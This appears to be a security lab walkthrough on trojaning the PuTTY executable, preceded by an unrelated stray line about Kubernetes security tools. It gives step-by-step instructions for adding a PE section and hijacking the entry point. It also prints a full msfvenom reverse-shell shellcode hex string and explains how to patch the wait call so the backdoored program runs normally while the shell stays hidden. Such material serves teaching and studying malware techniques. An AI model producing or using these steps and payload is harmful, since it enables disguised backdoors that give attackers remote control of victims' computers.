Kubernetes Security Tools
This post lists out popular K8s security tools. The list will be updated regularly.
To modify a Windows EXE file and save an altered version containing Trojan code in a new PE section without breaking the program.
Caution
Due to ASLR, you may notice the first half of memory address (e.g.: 014A1234) will change everytime when you start Immunity debugger. Please adjust your memory address accordingly.
putty.exe
and LordPE
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
https://samsclass.info/127/proj/lordpe.zip
To modify a Windows EXE file and save an altered version containing Trojan code in a new PE section without breaking the program.
Duplicate putty.exe
and change the file name to putty-mod1.exe
Use LordPE to add new section to putty-mod1.exe
For details, please refer to task 1 in https://samsclass.info/127/proj/p8bim.htm
Please note the ROffset
of new section is BA000
.
In Immunity, open putty-mod1.exe
.
Using Immunity Debugger to Examine the NewSec
Section. Go to View > Memory
.
It shows the memory layout of putty. As outlined in blue in the image below, the NewSec
section begins at address 0x014A3000
.
Please right click the section and choose Dump in CPU
as shown below.
You will be redirected back to CPU window. Please note program entry point is 0x01477FD6
(CALL putty-mo.01478265
)
Double click CALL putty-mo.01478265
and change it to CALL 014A3000
(The starting address of the new section)
Right click 01477FD6
again and go to Copy to execute > All Modifications
A new window pops up, right-click in the new window and click Save file
.
Save the file with file name putty-mod2.exe
You need to insert the following assembly in the new section.
Assembly Code | Usage |
---|---|
PUSHAD (60) PUSHFD (9C) |
To preserve the register/flag values before shellcode execution |
Shellcode generated by msfvenom | Shellcode generated by msfvenom |
Align Stack (e.g.: ADD ESP,200) | ESP is changed by shell code. Align stack value for POPFD and POPAD. |
POPFD |
To restore register/flag values before shellcode execution |
CALL putty-mo.01478265 (The original assembly begin replaced) |
Restore program flow |
PUSHAD
, PUSHFD
and ShellcodeGenerate your favourite shellcode using msfvenom. If you generate reverse shell shellcode, please setup handler on your "attacker" machine.
Go to offset BA000
(ROffset
of new section) by go to View > Goto
Overwrite the data with 609C[Your shellcode]
starting from offset BA000
.
For example:
609Cfce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a0568c0a8b286680200115c89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbaac5e25d68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5
Save the file as putty-mod3.exe
.
Back to Immunity Debugger and open putty-mod3.exe
.
Reminder
If you generate reverse shell shellcode, please setup handler on your "attacker" machine.
This next part can be tricky, but what we essentially want to do is start to step through the newly introduced code (by pressing F7
), however stop and make note of the value of ESP
after our PUSHFD
, and as always, save it for later. (i.e.: 0029FD74
)
Please also note that PUSHAD
and PUSHFD
push register value and Flag value to stack respectively.
Please scroll down to end of shellcode (or you can leverage search function to search last few bytes of your shellcode)
Toggle breakpoint just after the shellcode. Choose Yes
when you see Suspicious breakpoint
popup.
Continue the program execution and hit the breakpoint.
Please connect/disconnect the reverse shell and let the shellcode being exeucted.
Note the ESP
is now 0029FB74
. The ESP
before shellcode is 0029FD74
.
We have two ESP
values. We will use them to restore our stack and access our saved values. To do this though, we will first need to work out the difference between the two values. (The difference between 0029FB74
to 0029FD74
is 0x200
)
We need to restore (or re-align) the ESP
value to original ESP
value before shellcode. To do this, we need to add ADD ESP, 200
just after the shellcode.
Double click code in address 01433146
and change it to ADD ESP, 200
.
Press F7
to step over the ADD ESP, 200
. We verified the ESP
has been restored to 0029FD74
.
POPFD
and POPAD
We need to restore the registers and flags to before shellcode state. To do this, we need to add POPFD
and POPAD
.
Add POPFD
and POPAD
after ADD ESP,200
as shown below.
To restore the original program flow. You need to insert the following code in the new section. We need to add the replaced code (CALL putty-mo.01478265
) and jump to the instruction after the original replaced instruction.
CALL putty-mo.01478265
JMP 01477FDB
You may notice first half of memory address is changed from 0147
to 0140
in screenshot. Due to ASLR, the memory will be different for each Immunity debugger session. You need to adjust your memory address accordingly.
Highlight the new add code starting from ADD ESP,200
to JMP putty-mo.01477FDB
.
Right click the selection and go to Copy to execute > Selection
.
A new window pops up, right-click in the new window and click Save file
. Save the file with name putty-mod4.exe
.
Please exit Immunity debugger.
You can test your shellcode outside Immunity debugger. You will notice you need to disconnect the shell in order to continue the program execution.
It is due to msfvenom payload calling WaitForSingleObject
with parameter dwMilliseconds
= -1 (Infinite wait)
. For WaitForSingleObject
details, please refer to https://msdn.microsoft.com/en-us/library/windows/desktop/ms687032(v=vs.85).aspx
.
In order to resolve this problem, you need to make sure the parameter value dwMilliseconds=0
by replacing the instruction DEC ESI
with NOP
.
In Immunity debugger, open putty-mod4.exe
. (Please start a new Immunity debugger session if you didn't exit Immunity debugger in previous step)
The DEC ESI
instruction appears around 10~20 assembly codes above ADD ESP,200
.
If you want to locate WaitForSingleObject
call, you may refer to this website https://webcache.googleusercontent.com/search?q=cache:0Td191uQAQIJ:https://simonuvarov.com/msfvenom-reverse-tcp-waitforsingleobject/+&cd=3&hl=zh-TW&ct=clnk&gl=us
.
You can also step through the code to inspect WaitForSingleObject
call.
Right click code change and go to Copy to execute > Selection
.
A new window pops up, right-click in the new window and click Save file
. Save the file with file name putty-mod5.exe
.
Test your putty-mod5.exe
outside Immunity Debugger and the Putty will be executed normally and reverse shell has been established.